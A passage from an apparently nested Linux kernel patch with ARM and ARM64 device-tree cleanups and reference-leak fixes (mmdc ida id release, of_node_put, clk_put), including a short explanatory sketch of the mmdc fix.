+ 		enable-active-high;
+-		enable-gpio = <&r_pio 0 8 GPIO_ACTIVE_HIGH>; /* PL8 */
++		enable-gpios = <&r_pio 0 8 GPIO_ACTIVE_HIGH>; /* PL8 */
+ 		gpios = <&r_pio 0 6 GPIO_ACTIVE_HIGH>; /* PL6 */
+ 		gpios-states = <0x1>;
+ 		states = <1100000 0>, <1300000 1>;
+diff --git a/arch/arm/configs/bcm2835_defconfig b/arch/arm/configs/bcm2835_defconfig
+index a51babd178c26..be0c984a66947 100644
+--- a/arch/arm/configs/bcm2835_defconfig
++++ b/arch/arm/configs/bcm2835_defconfig
+@@ -107,6 +107,7 @@ CONFIG_MEDIA_CAMERA_SUPPORT=y
+ CONFIG_DRM=y
+ CONFIG_DRM_V3D=y
+ CONFIG_DRM_VC4=y
++CONFIG_FB=y
+ CONFIG_FB_SIMPLE=y
+ CONFIG_FRAMEBUFFER_CONSOLE=y
+ CONFIG_SOUND=y
+diff --git a/arch/arm/mach-imx/mmdc.c b/arch/arm/mach-imx/mmdc.c
+index af12668d0bf51..b9efe9da06e0b 100644
+--- a/arch/arm/mach-imx/mmdc.c
++++ b/arch/arm/mach-imx/mmdc.c
+@@ -99,6 +99,7 @@ struct mmdc_pmu {
+ 	cpumask_t cpu;
+ 	struct hrtimer hrtimer;
+ 	unsigned int active_events;
++	int id;
+ 	struct device *dev;
+ 	struct perf_event *mmdc_events[MMDC_NUM_COUNTERS];
+ 	struct hlist_node node;
+@@ -433,8 +434,6 @@ static enum hrtimer_restart mmdc_pmu_timer_handler(struct hrtimer *hrtimer)
+ static int mmdc_pmu_init(struct mmdc_pmu *pmu_mmdc,
+ 		void __iomem *mmdc_base, struct device *dev)
+ {
+-	int mmdc_num;
+-
+ 	*pmu_mmdc = (struct mmdc_pmu) {
+ 		.pmu = (struct pmu) {
+ 			.task_ctx_nr    = perf_invalid_context,
+@@ -452,15 +451,16 @@ static int mmdc_pmu_init(struct mmdc_pmu *pmu_mmdc,
+ 		.active_events = 0,
+ 	};
+ 
+-	mmdc_num = ida_simple_get(&mmdc_ida, 0, 0, GFP_KERNEL);
++	pmu_mmdc->id = ida_simple_get(&mmdc_ida, 0, 0, GFP_KERNEL);
+ 
+-	return mmdc_num;
++	return pmu_mmdc->id;
+ }
+ 
+ static int imx_mmdc_remove(struct platform_device *pdev)
+ {
+ 	struct mmdc_pmu *pmu_mmdc = platform_get_drvdata(pdev);
+ 
++	ida_simple_remove(&mmdc_ida, pmu_mmdc->id);
+ 	cpuhp_state_remove_instance_nocalls(cpuhp_mmdc_state, &pmu_mmdc->node);
+ 	perf_pmu_unregister(&pmu_mmdc->pmu);
+ 	iounmap(pmu_mmdc->mmdc_base);
+@@ -474,7 +474,6 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ {
+ 	struct mmdc_pmu *pmu_mmdc;
+ 	char *name;
+-	int mmdc_num;
+ 	int ret;
+ 	const struct of_device_id *of_id =
+ 		of_match_device(imx_mmdc_dt_ids, &pdev->dev);
+@@ -497,14 +496,14 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ 		cpuhp_mmdc_state = ret;
+ 	}
+ 
+-	mmdc_num = mmdc_pmu_init(pmu_mmdc, mmdc_base, &pdev->dev);
+-	pmu_mmdc->mmdc_ipg_clk = mmdc_ipg_clk;
+-	if (mmdc_num == 0)
+-		name = "mmdc";
+-	else
+-		name = devm_kasprintf(&pdev->dev,
+-				GFP_KERNEL, "mmdc%d", mmdc_num);
++	ret = mmdc_pmu_init(pmu_mmdc, mmdc_base, &pdev->dev);
++	if (ret < 0)
++		goto  pmu_free;
+ 
++	name = devm_kasprintf(&pdev->dev,
++				GFP_KERNEL, "mmdc%d", ret);
++
++	pmu_mmdc->mmdc_ipg_clk = mmdc_ipg_clk;
+ 	pmu_mmdc->devtype_data = (struct fsl_mmdc_devtype_data *)of_id->data;
+ 
+ 	hrtimer_init(&pmu_mmdc->hrtimer, CLOCK_MONOTONIC,
+@@ -525,6 +524,7 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ 
+ pmu_register_err:
+ 	pr_warn("MMDC Perf PMU failed (%d), disabled\n", ret);
++	ida_simple_remove(&mmdc_ida, pmu_mmdc->id);
+ 	cpuhp_state_remove_instance_nocalls(cpuhp_mmdc_state, &pmu_mmdc->node);
+ 	hrtimer_cancel(&pmu_mmdc->hrtimer);
+ pmu_free:
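
The mmdc fix stores the ida-allocated instance number in the per-pmu
structure so that both the probe error path and imx_mmdc_remove() can
return it with ida_simple_remove(); previously the id was only held in
a local variable and therefore leaked. A kernel-flavoured sketch of
that lifetime rule (illustrative names, not the driver itself):

#include <linux/gfp.h>
#include <linux/idr.h>

static DEFINE_IDA(example_ida);

struct example_pmu {
        int id;                     /* ida-allocated instance number */
};

static int example_probe(struct example_pmu *pmu)
{
        pmu->id = ida_simple_get(&example_ida, 0, 0, GFP_KERNEL);
        if (pmu->id < 0)
                return pmu->id;

        /* ... on any later failure: ida_simple_remove() before return ... */
        return 0;
}

static void example_remove(struct example_pmu *pmu)
{
        ida_simple_remove(&example_ida, pmu->id);
}
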
+diff --git a/arch/arm/mach-omap1/timer.c b/arch/arm/mach-omap1/timer.c
+index f5cd4bbf7566d..81a912c1145a9 100644
+--- a/arch/arm/mach-omap1/timer.c
++++ b/arch/arm/mach-omap1/timer.c
+@@ -158,7 +158,7 @@ err_free_pdata:
+ 	kfree(pdata);
+ 
+ err_free_pdev:
+-	platform_device_unregister(pdev);
++	platform_device_put(pdev);
+ 
+ 	return ret;
+ }
+diff --git a/arch/arm/mach-omap2/omap4-common.c b/arch/arm/mach-omap2/omap4-common.c
+index 6d1eb4eefefe5..d9ed2a5dcd5ef 100644
+--- a/arch/arm/mach-omap2/omap4-common.c
++++ b/arch/arm/mach-omap2/omap4-common.c
+@@ -140,6 +140,7 @@ static int __init omap4_sram_init(void)
+ 			__func__);
+ 	else
+ 		sram_sync = (void __iomem *)gen_pool_alloc(sram_pool, PAGE_SIZE);
++	of_node_put(np);
+ 
+ 	return 0;
+ }
+diff --git a/arch/arm/mach-omap2/timer.c b/arch/arm/mach-omap2/timer.c
+index 620ba69c8f114..5677c4a08f376 100644
+--- a/arch/arm/mach-omap2/timer.c
++++ b/arch/arm/mach-omap2/timer.c
+@@ -76,6 +76,7 @@ static void __init realtime_counter_init(void)
+ 	}
+ 
+ 	rate = clk_get_rate(sys_clk);
++	clk_put(sys_clk);
+ 
+ 	if (soc_is_dra7xx()) {
+ 		/*
+diff --git a/arch/arm/mach-s3c/s3c64xx.c b/arch/arm/mach-s3c/s3c64xx.c
+index 0a8116c108fe4..dce2b0e953088 100644
+--- a/arch/arm/mach-s3c/s3c64xx.c
++++ b/arch/arm/mach-s3c/s3c64xx.c
+@@ -173,7 +173,8 @@ static struct samsung_pwm_variant s3c64xx_pwm_variant = {
+ 	.tclk_mask	= (1 << 7) | (1 << 6) | (1 << 5),
+ };
+ 
+-void __init s3c64xx_set_timer_source(unsigned int event, unsigned int source)
++void __init s3c64xx_set_timer_source(enum s3c64xx_timer_mode event,
++				     enum s3c64xx_timer_mode source)
+ {
+ 	s3c64xx_pwm_variant.output_mask = BIT(SAMSUNG_PWM_NUM) - 1;
+ 	s3c64xx_pwm_variant.output_mask &= ~(BIT(event) | BIT(source));
+diff --git a/arch/arm/mach-zynq/slcr.c b/arch/arm/mach-zynq/slcr.c
+index 37707614885a5..9765b3f4c2fc5 100644
+--- a/arch/arm/mach-zynq/slcr.c
++++ b/arch/arm/mach-zynq/slcr.c
+@@ -213,6 +213,7 @@ int __init zynq_early_slcr_init(void)
+ 	zynq_slcr_regmap = syscon_regmap_lookup_by_compatible("xlnx,zynq-slcr");
+ 	if (IS_ERR(zynq_slcr_regmap)) {
+ 		pr_err("%s: failed to find zynq-slcr\n", __func__);
++		of_node_put(np);
+ 		return -ENODEV;
+ 	}
+ 
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index 505c8a1ccbe0c..43ff7c7a3ac97 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -98,7 +98,6 @@ config ARM64
+ 	select ARCH_WANT_DEFAULT_TOPDOWN_MMAP_LAYOUT
+ 	select ARCH_WANT_FRAME_POINTERS
+ 	select ARCH_WANT_HUGE_PMD_SHARE if ARM64_4K_PAGES || (ARM64_16K_PAGES && !ARM64_VA_BITS_36)
+-	select ARCH_WANT_HUGETLB_PAGE_OPTIMIZE_VMEMMAP
+ 	select ARCH_WANT_LD_ORPHAN_WARN
+ 	select ARCH_WANTS_NO_INSTR
+ 	select ARCH_WANTS_THP_SWAP if ARM64_4K_PAGES
+diff --git a/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi b/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi
+index 5836b00309312..e1605a9b0a13f 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi
+@@ -168,15 +168,15 @@
+ 		reg = <0x32 0x20>;
+ 	};
+ 
+-	eth_mac: eth_mac@0 {
++	eth_mac: eth-mac@0 {
+ 		reg = <0x0 0x6>;
+ 	};
+ 
+-	bt_mac: bt_mac@6 {
++	bt_mac: bt-mac@6 {
+ 		reg = <0x6 0x6>;
+ 	};
+ 
+-	wifi_mac: wifi_mac@c {
++	wifi_mac: wifi-mac@c {
+ 		reg = <0xc 0x6>;
+ 	};
+ 
+@@ -217,7 +217,7 @@
+ 	pinctrl-names = "default";
+ 
+ 	/* RTC */
+-	pcf8563: pcf8563@51 {
++	pcf8563: rtc@51 {
+ 		compatible = "nxp,pcf8563";
+ 		reg = <0x51>;
+ 		status = "okay";
+@@ -303,7 +303,7 @@
+ 
+ &usb {
+ 	status = "okay";
+-	phy-supply = <&usb_pwr>;
++	vbus-supply = <&usb_pwr>;
+ };
+ 
+ &spicc1 {
+diff --git a/arch/arm64/boot/dts/amlogic/meson-axg.dtsi b/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
+index 73cd1791a13fa..6cc685f91fc94 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
+@@ -152,7 +152,7 @@
+ 		scpi_clocks: clocks {
+ 			compatible = "arm,scpi-clocks";
+ 
+-			scpi_dvfs: clock-controller {
++			scpi_dvfs: clocks-0 {
+ 				compatible = "arm,scpi-dvfs-clocks";
+ 				#clock-cells = <1>;
+ 				clock-indices = <0>;
+@@ -161,7 +161,7 @@
+ 		};
+ 
+ 		scpi_sensors: sensors {
+-			compatible = "amlogic,meson-gxbb-scpi-sensors";
++			compatible = "amlogic,meson-gxbb-scpi-sensors", "arm,scpi-sensors";
+ 			#thermal-sensor-cells = <1>;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+index 894cea697550a..131a8a5a9f5a0 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+@@ -1694,7 +1694,7 @@
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+ 
+-					internal_ephy: ethernet_phy@8 {
++					internal_ephy: ethernet-phy@8 {
+ 						compatible = "ethernet-phy-id0180.3301",
+ 							     "ethernet-phy-ieee802.3-c22";
+ 						interrupts = <GIC_SPI 9 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts b/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts
+index e3bb6df42ff3e..cf0a9be83fc47 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts
+@@ -401,5 +401,4 @@
+ 
+ &usb {
+ 	status = "okay";
+-	dr_mode = "host";
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi
+index fb0ab27d1f642..6eaceb717d617 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi
+@@ -57,26 +57,6 @@
+ 		compatible = "operating-points-v2";
+ 		opp-shared;
+ 
+-		opp-100000000 {
+-			opp-hz = /bits/ 64 <100000000>;
+-			opp-microvolt = <731000>;
+-		};
+-
+-		opp-250000000 {
+-			opp-hz = /bits/ 64 <250000000>;
+-			opp-microvolt = <731000>;
+-		};
+-
+-		opp-500000000 {
+-			opp-hz = /bits/ 64 <500000000>;
+-			opp-microvolt = <731000>;
+-		};
+-
+-		opp-667000000 {
+-			opp-hz = /bits/ 64 <666666666>;
+-			opp-microvolt = <731000>;
+-		};
+-
+ 		opp-1000000000 {
+ 			opp-hz = /bits/ 64 <1000000000>;
+ 			opp-microvolt = <731000>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi b/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi
+index bcdf55f48a831..4e84ab87cc7db 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi
+@@ -17,7 +17,7 @@
+ 		io-channel-names = "buttons";
+ 		keyup-threshold-microvolt = <1800000>;
+ 
+-		update-button {
++		button-update {
+ 			label = "update";
+ 			linux,code = <KEY_VENDOR>;
+ 			press-threshold-microvolt = <1300000>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gx.dtsi b/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
+index fa6cff4a2ebc3..80d86780cb6ba 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
+@@ -232,7 +232,7 @@
+ 			reg = <0x14 0x10>;
+ 		};
+ 
+-		eth_mac: eth_mac@34 {
++		eth_mac: eth-mac@34 {
+ 			reg = <0x34 0x10>;
+ 		};
+ 
+@@ -249,7 +249,7 @@
+ 		scpi_clocks: clocks {
+ 			compatible = "arm,scpi-clocks";
+ 
+-			scpi_dvfs: scpi_clocks@0 {
++			scpi_dvfs: clocks-0 {
+ 				compatible = "arm,scpi-dvfs-clocks";
+ 				#clock-cells = <1>;
+ 				clock-indices = <0>;
+@@ -531,7 +531,7 @@
+ 			#size-cells = <2>;
+ 			ranges = <0x0 0x0 0x0 0xc8834000 0x0 0x2000>;
+ 
+-			hwrng: rng {
++			hwrng: rng@0 {
+ 				compatible = "amlogic,meson-rng";
+ 				reg = <0x0 0x0 0x0 0x4>;
+ 			};
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts b/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts
+index 6d8cc00fedc7f..5f2d4317ecfbf 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts
+@@ -16,7 +16,7 @@
+ 
+ 	leds {
+ 		compatible = "gpio-leds";
+-		status {
++		led {
+ 			gpios = <&gpio_ao GPIOAO_13 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+ 			color = <LED_COLOR_ID_RED>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts
+index 9ef210f17b4aa..393d3cb33b9ee 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts
+@@ -18,7 +18,7 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		status {
++		led {
+ 			label = "n1:white:status";
+ 			gpios = <&gpio_ao GPIOAO_9 GPIO_ACTIVE_HIGH>;
+ 			default-state = "on";
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts
+index b331a013572f3..c490dbbf063bf 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts
+@@ -79,6 +79,5 @@
+ 		enable-gpios = <&gpio GPIOX_17 GPIO_ACTIVE_HIGH>;
+ 		max-speed = <2000000>;
+ 		clocks = <&wifi32k>;
+-		clock-names = "lpo";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts b/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts
+index 6831137c5c109..a18d6d241a5ad 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts
+@@ -86,11 +86,11 @@
+ };
+ 
+ &efuse {
+-	bt_mac: bt_mac@6 {
++	bt_mac: bt-mac@6 {
+ 		reg = <0x6 0x6>;
+ 	};
+ 
+-	wifi_mac: wifi_mac@C {
++	wifi_mac: wifi-mac@c {
+ 		reg = <0xc 0x6>;
+ 	};
+ };
+@@ -239,7 +239,7 @@
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&i2c_b_pins>;
+ 
+-	pcf8563: pcf8563@51 {
++	pcf8563: rtc@51 {
+ 		compatible = "nxp,pcf8563";
+ 		reg = <0x51>;
+ 		status = "okay";
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi b/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
+index c3ac531c4f84a..3500229350522 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
+@@ -759,7 +759,7 @@
+ 		};
+ 	};
+ 
+-	eth-phy-mux {
++	eth-phy-mux@55c {
+ 		compatible = "mdio-mux-mmioreg", "mdio-mux";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts b/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts
+index cadba194b149b..38ebe98ba9c6b 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts
+@@ -17,13 +17,13 @@
+ 	compatible = "bananapi,bpi-m5", "amlogic,sm1";
+ 	model = "Banana Pi BPI-M5";
+ 
+-	adc_keys {
++	adc-keys {
+ 		compatible = "adc-keys";
+ 		io-channels = <&saradc 2>;
+ 		io-channel-names = "buttons";
+ 		keyup-threshold-microvolt = <1800000>;
+ 
+-		key {
++		button-sw3 {
+ 			label = "SW3";
+ 			linux,code = <BTN_3>;
+ 			press-threshold-microvolt = <1700000>;
+@@ -123,7 +123,7 @@
+ 		regulator-min-microvolt = <1800000>;
+ 		regulator-max-microvolt = <3300000>;
+ 
+-		enable-gpio = <&gpio_ao GPIOE_2 GPIO_ACTIVE_HIGH>;
++		enable-gpio = <&gpio_ao GPIOE_2 GPIO_OPEN_DRAIN>;
+ 		enable-active-high;
+ 		regulator-always-on;
+ 
+diff --git a/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts b/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts
+index e3486f60645a4..3d642d739c359 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts
+@@ -76,9 +76,17 @@
+ };
+ 
+ &cpu_thermal {
++	trips {
++		cpu_active: cpu-active {
++			temperature = <60000>; /* millicelsius */
++			hysteresis = <2000>; /* millicelsius */
++			type = "active";
++		};
++	};
++
+ 	cooling-maps {
+ 		map {
+-			trip = <&cpu_passive>;
++			trip = <&cpu_active>;
+ 			cooling-device = <&fan0 THERMAL_NO_LIMIT THERMAL_NO_LIMIT>;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm.dtsi b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+index 50ef92915c671..420ba0d6f1343 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+@@ -562,7 +562,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mm_uid: unique-id@410 {
++				imx8mm_uid: unique-id@4 {
+ 					reg = <0x4 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn.dtsi b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+index 67b554ba690ca..ba29b5b556ffa 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+@@ -563,7 +563,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mn_uid: unique-id@410 {
++				imx8mn_uid: unique-id@4 {
+ 					reg = <0x4 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp.dtsi b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+index 47fd6a0ba05ad..25630a395db56 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+@@ -424,7 +424,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mp_uid: unique-id@420 {
++				imx8mp_uid: unique-id@8 {
+ 					reg = <0x8 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq.dtsi b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+index 19eaa523564d3..4724ed0cbff94 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+@@ -592,7 +592,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mq_uid: soc-uid@410 {
++				imx8mq_uid: soc-uid@4 {
+ 					reg = <0x4 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622.dtsi b/arch/arm64/boot/dts/mediatek/mt7622.dtsi
+index 146e18b5b1f46..7bb316922a3a9 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7622.dtsi
+@@ -435,6 +435,7 @@
+ 	pwm: pwm@11006000 {
+ 		compatible = "mediatek,mt7622-pwm";
+ 		reg = <0 0x11006000 0 0x1000>;
++		#pwm-cells = <2>;
+ 		interrupts = <GIC_SPI 77 IRQ_TYPE_LEVEL_LOW>;
+ 		clocks = <&topckgen CLK_TOP_PWM_SEL>,
+ 			 <&pericfg CLK_PERI_PWM_PD>,
+diff --git a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+index 35e01fa2d314b..fc338bd497f51 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+@@ -125,8 +125,7 @@
+ 		};
+ 
+ 		watchdog: watchdog@1001c000 {
+-			compatible = "mediatek,mt7986-wdt",
+-				     "mediatek,mt6589-wdt";
++			compatible = "mediatek,mt7986-wdt";
+ 			reg = <0 0x1001c000 0 0x1000>;
+ 			interrupts = <GIC_SPI 110 IRQ_TYPE_LEVEL_HIGH>;
+ 			#reset-cells = <1>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183.dtsi b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+index 402136bfd5350..268a1f28af8ce 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+@@ -585,6 +585,15 @@
+ 		method = "smc";
+ 	};
+ 
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
++		#clock-cells = <0>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
++		clock-output-names = "clk13m";
++	};
++
+ 	clk26m: oscillator {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+@@ -968,8 +977,7 @@
+ 				     "mediatek,mt6765-timer";
+ 			reg = <0 0x10017000 0 0x1000>;
+ 			interrupts = <GIC_SPI 200 IRQ_TYPE_LEVEL_HIGH>;
+-			clocks = <&topckgen CLK_TOP_CLK13M>;
+-			clock-names = "clk13m";
++			clocks = <&clk13m>;
+ 		};
+ 
+ 		iommu: iommu@10205000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8186.dtsi b/arch/arm64/boot/dts/mediatek/mt8186.dtsi
+index 64693c17af9ec..f88d660e41540 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8186.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8186.dtsi
+@@ -47,14 +47,12 @@
+ 				core5 {
+ 					cpu = <&cpu5>;
+ 				};
+-			};
+ 
+-			cluster1 {
+-				core0 {
++				core6 {
+ 					cpu = <&cpu6>;
+ 				};
+ 
+-				core1 {
++				core7 {
+ 					cpu = <&cpu7>;
+ 				};
+ 			};
+@@ -211,10 +209,12 @@
+ 		};
+ 	};
+ 
+-	clk13m: oscillator-13m {
+-		compatible = "fixed-clock";
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
+ 		#clock-cells = <0>;
+-		clock-frequency = <13000000>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
+ 		clock-output-names = "clk13m";
+ 	};
+ 
+@@ -330,8 +330,7 @@
+ 		};
+ 
+ 		watchdog: watchdog@10007000 {
+-			compatible = "mediatek,mt8186-wdt",
+-				     "mediatek,mt6589-wdt";
++			compatible = "mediatek,mt8186-wdt";
+ 			mediatek,disable-extrst;
+ 			reg = <0 0x10007000 0 0x1000>;
+ 			#reset-cells = <1>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192.dtsi b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+index 6b20376191a75..ef1294d960145 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+@@ -29,6 +29,15 @@
+ 		rdma4 = &rdma4;
+ 	};
+ 
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
++		#clock-cells = <0>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
++		clock-output-names = "clk13m";
++	};
++
+ 	clk26m: oscillator0 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+@@ -149,19 +158,16 @@
+ 				core3 {
+ 					cpu = <&cpu3>;
+ 				};
+-			};
+-
+-			cluster1 {
+-				core0 {
++				core4 {
+ 					cpu = <&cpu4>;
+ 				};
+-				core1 {
++				core5 {
+ 					cpu = <&cpu5>;
+ 				};
+-				core2 {
++				core6 {
+ 					cpu = <&cpu6>;
+ 				};
+-				core3 {
++				core7 {
+ 					cpu = <&cpu7>;
+ 				};
+ 			};
+@@ -531,8 +537,7 @@
+ 				     "mediatek,mt6765-timer";
+ 			reg = <0 0x10017000 0 0x1000>;
+ 			interrupts = <GIC_SPI 233 IRQ_TYPE_LEVEL_HIGH 0>;
+-			clocks = <&topckgen CLK_TOP_CSW_F26M_D2>;
+-			clock-names = "clk13m";
++			clocks = <&clk13m>;
+ 		};
+ 
+ 		pwrap: pwrap@10026000 {
+@@ -575,6 +580,8 @@
+ 			compatible = "mediatek,mt8192-scp_adsp";
+ 			reg = <0 0x10720000 0 0x1000>;
+ 			#clock-cells = <1>;
++			/* power domain dependency not upstreamed */
++			status = "fail";
+ 		};
+ 
+ 		uart0: serial@11002000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index 6f5fa7ca49013..2c2b946b614bf 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -150,22 +150,20 @@
+ 				core3 {
+ 					cpu = <&cpu3>;
+ 				};
+-			};
+ 
+-			cluster1 {
+-				core0 {
++				core4 {
+ 					cpu = <&cpu4>;
+ 				};
+ 
+-				core1 {
++				core5 {
+ 					cpu = <&cpu5>;
+ 				};
+ 
+-				core2 {
++				core6 {
+ 					cpu = <&cpu6>;
+ 				};
+ 
+-				core3 {
++				core7 {
+ 					cpu = <&cpu7>;
+ 				};
+ 			};
+@@ -244,6 +242,15 @@
+ 		status = "disabled";
+ 	};
+ 
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
++		#clock-cells = <0>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
++		clock-output-names = "clk13m";
++	};
++
+ 	clk26m: oscillator-26m {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+@@ -683,8 +690,7 @@
+ 		};
+ 
+ 		watchdog: watchdog@10007000 {
+-			compatible = "mediatek,mt8195-wdt",
